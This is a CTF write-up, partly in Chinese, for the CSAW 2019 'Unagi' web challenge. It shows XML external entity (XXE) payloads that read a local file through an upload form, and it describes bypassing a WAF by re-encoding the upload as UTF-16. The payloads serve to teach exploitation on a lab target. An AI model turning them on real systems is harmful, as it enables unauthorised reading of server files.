[CSAWQual 2019]Web_Unagi

/index.php

/user.php

/upload.php

/sample.xml

<?xml version='1.0'?>
<users>
    <user>
        <username>alice</username>
        <password>passwd1</password>
        <name>Alice</name>
        <email>alice@fakesite.com</email>  
        <group>CSAW2019</group>
    </user>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
    </user>
</users>

/about.php

尝试进行XXE

<?xml version='1.0'?>
<!DOCTYPE xxe [
	<!ENTITY flag SYSTEM "file:///flag">
]>
<users>
    <user>
        <username>sad</username>
        <password>114514</password>
        <name>CrackTC</name>
        <email>123@baidu.com</email>  
        <group>&flag;</group>
    </user>
</users>

遭到了WAF的拦截

转换文件编码为utf16后成功绕过

group属性貌似会被截断，干脆全改上

<?xml version='1.0'?>
<!DOCTYPE xxe [
	<!ENTITY flag SYSTEM "file:///flag">
]>
<users>
    <user>
        <username>&flag;</username>
        <password>&flag;</password>
        <name>&flag;</name>
        <email>&flag;</email>  
        <group>&flag;</group>
    </user>
</users>

然鹅都被截断了qaq

最后发现原来还有个intro没写在sample里

<?xml version='1.0'?>
<!DOCTYPE xxe [
	<!ENTITY flag SYSTEM "file:///flag">
]>
<users>
    <user>
        <username>&flag;</username>
        <password>&flag;</password>
        <name>&flag;</name>
        <email>&flag;</email>
        <group>&flag;</group>
        <intro>&flag;</intro>
    </user>
</users>

> Passions & dreams like sora, *zipped* up in my heart

[CSAWQual 2019]Web_Unagi

> Passions & dreams like sora, zipped up in my heart